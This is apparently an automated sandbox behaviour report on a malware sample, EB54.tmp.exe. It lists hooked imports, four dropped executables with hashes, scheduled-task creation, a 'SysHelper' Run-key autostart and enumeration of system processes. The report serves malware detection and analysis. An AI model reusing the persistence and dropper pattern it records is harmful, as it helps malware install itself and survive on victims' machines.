OS Process Information
»
Information Value
PID 0x2c8
Parent PID 0xa78 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 204
0x 694
0x 2B0
0x 444
0x 684
0x 73C
0x 664
0x 738
0x 3D0
0x 8A8
0x 8A0
0x 890
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000240000:+0x5558d 2. entry of eb54.tmp.exe 4 bytes kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x9c22b0c
...
IAT private_0x0000000000240000:+0x5558d 3. entry of eb54.tmp.exe 4 bytes kernel32.dll:TerminateThread+0x0 now points to private_0x000000007fff0000:+0x433cf85d
...
IAT private_0x0000000000240000:+0x5558d 4. entry of eb54.tmp.exe 4 bytes kernel32.dll:WritePrivateProfileStructW+0x0 now points to private_0x000000007fff0000:+0x9115d8b
...
IAT private_0x0000000000240000:+0x5558d 5. entry of eb54.tmp.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x610184d
...
IAT private_0x0000000000240000:+0x5558d 7. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0xbf97d8b
...
IAT private_0x0000000000240000:+0x5558d 8. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x79040c45
...
IAT private_0x0000000000240000:+0x5558d 12. entry of eb54.tmp.exe 4 bytes kernel32.dll:LocalAlloc+0x0 now points to private_0x00000000006a0000:+0x1573
...
IAT private_0x0000000000240000:+0x5558d 13. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0xbf975ff
...
IAT private_0x0000000000240000:+0x5558d 18. entry of eb54.tmp.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0xb8074f3
...
IAT private_0x0000000000240000:+0x5558d 19. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x78841446
...
IAT private_0x0000000000240000:+0x5558d 20. entry of eb54.tmp.exe 4 bytes kernel32.dll:lstrcpyA+0x0 now points to private_0x000000007fff0000:+0xb087208
...
IAT private_0x0000000000240000:+0x5558d 25. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x568c02eb
...
IAT private_0x0000000000240000:+0x5558d 26. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetDriveTypeW+0x0 now points to private_0x000000007fff0000:+0x5fd458b
...
IAT private_0x0000000000240000:+0x5558d 27. entry of eb54.tmp.exe 4 bytes kernel32.dll:DuplicateHandle+0x0 now points to private_0x000000007fff0000:+0xb2274c0
...
IAT private_0x0000000000240000:+0x5558d 28. entry of eb54.tmp.exe 4 bytes kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x000000007fff0000:+0x4004085d
...
IAT private_0x0000000000240000:+0x5558d 33. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x3a7be850
...
IAT private_0x0000000000240000:+0x5558d 40. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0x4e8c02eb
...
IAT private_0x0000000000240000:+0x5558d 41. entry of eb54.tmp.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to private_0x000000007fff0000:+0x519458b
...
IAT private_0x0000000000240000:+0x5558d 42. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x69850fc0
...
IAT private_0x0000000000240000:+0x5558d 47. entry of eb54.tmp.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x7a83e850
...
IAT private_0x0000000000240000:+0x5558d 48. entry of eb54.tmp.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x44840001
...
IAT private_0x0000000000240000:+0x5558d 54. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b0f8b04
...
IAT private_0x0000000000240000:+0x5558d 55. entry of eb54.tmp.exe 4 bytes kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0x3cf8b02
...
IAT private_0x0000000000240000:+0x5558d 64. entry of eb54.tmp.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x6b178b04
...
IAT private_0x0000000000240000:+0x5558d 65. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetTickCount+0x0 now points to private_0x000000007fff0000:+0x3d78b02
...
IAT private_0x0000000000240000:+0x5558d 69. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7c76ff0c
...
IAT private_0x0000000000240000:+0x5558d 72. entry of eb54.tmp.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x69420c8d
...
IAT private_0x0000000000240000:+0x5558d 75. entry of eb54.tmp.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x315468b
...
IAT private_0x0000000000240000:+0x5558d 78. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7884d68b
...
IAT private_0x0000000000240000:+0x5558d 79. entry of eb54.tmp.exe 4 bytes kernel32.dll:VirtualAlloc+0x0 now points to private_0x000000007fff0000:+0xb057208
...
IAT private_0x0000000000240000:+0x5558d 80. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0xb03eb0e
...
IAT private_0x0000000000240000:+0x5558d 84. entry of eb54.tmp.exe 4 bytes user32.dll:EndPaint+0x0 now points to private_0x000000007fff0000:+0xd20048d
...
IAT private_0x0000000000240000:+0x5558d 86. entry of eb54.tmp.exe 4 bytes user32.dll:EnumDisplaySettingsA+0x0 now points to private_0x000000007fff0000:+0xc00ff72
...
IAT private_0x0000000000240000:+0x5558d 87. entry of eb54.tmp.exe 4 bytes user32.dll:DrawTextExW+0x0 now points to private_0x000000007fff0000:+0x44841446
...
IAT private_0x0000000000240000:+0x5558d 90. entry of eb54.tmp.exe 4 bytes user32.dll:SetPropA+0x0 now points to private_0x000000007fff0000:+0x568c02eb
...
IAT private_0x0000000000240000:+0x5558d 92. entry of eb54.tmp.exe 4 bytes user32.dll:LoadImageA+0x0 now points to private_0x000000007fff0000:+0xb0f8b0e
...
IAT private_0x0000000000240000:+0x5558d 93. entry of eb54.tmp.exe 4 bytes user32.dll:DestroyCursor+0x0 now points to private_0x000000007fff0000:+0xd541445
...
Downloaded Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe 272.50 KB MD5: 5b4bd24d6240f467bfbc74803c9f15b0
SHA1: c17f98c182d299845c54069872e8137645768a1a
SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e
SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe 274.50 KB MD5: 996ba35165bb62473d2a6743a5200d45
SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0
SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d
SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe 277.50 KB MD5: e3083483121cd288264f8c5624fb2cd1
SHA1: 144a1dd6714ff4b5675c32f428d1899e500140a5
SHA256: 114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd
SSDeep: 6144:JMLLGApbfLsx8TsvD6OD61XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXX56:JMLdpMdhDyXXnXXfXXXWXXXXHXXXXBXK 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe 192.00 KB MD5: 7637e83def3c66546bb4a6ee5e963b03
SHA1: a108e7bc6008a541dfbf0921839a75dd2e2831c5
SHA256: 48417c1248dfbde668a1118f1d1178ccd0a29612035f25f5724c10a2d6e98fcd
SSDeep: 3072:HZBj7PK5clI62E9+v81gl6GH0g8NKKkbGcsRwMfPNHXyfhfwE8bOLT7Pu5dFY:HzGcw6+816pKxwMXwYElnPM 		False
...
Host Behavior
COM (8)
»
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 95, domain = 95, password = 4289035 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-05-14T03:23:26 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (613)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0 - True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Open - - False 498
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe size = 2560 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe size = 4608 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe size = 10240 True 27
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe size = 7680 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe size = 10240 True 19
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe size = 2048 True 1
Fn
Data
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion value_name = SysHelper, data = 0, type = REG_NONE False 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion value_name = SysHelper, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (51)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe show_window = SW_SHOWNORMAL True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files (x86)\adobe\jefferson balanced qualifications.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\uninstall information\zero.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\msbuild\partial.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\general_renewable_visual.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft visual studio 8\hayes-arlington-photography.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft sql server compact edition\acc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\reference assemblies\battery.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\jeffrey indiana.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\vendor carey nicholas.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\fetish_cd_education.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\hostel.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\engine.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\learners_textbooks.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft office\gratuitjuryreasonable.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla maintenance service\pursuit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\zincshniagara.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\msbuild\losses.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\msbuild\technologies_signatures_notebooks.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module (292)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 3
Fn
Load WINMM.dll base_address = 0x74af0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74b50000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x74a80000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load Psapi.dll base_address = 0x75140000 True 1
Fn
Load Shell32.dll base_address = 0x75fd0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 12
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
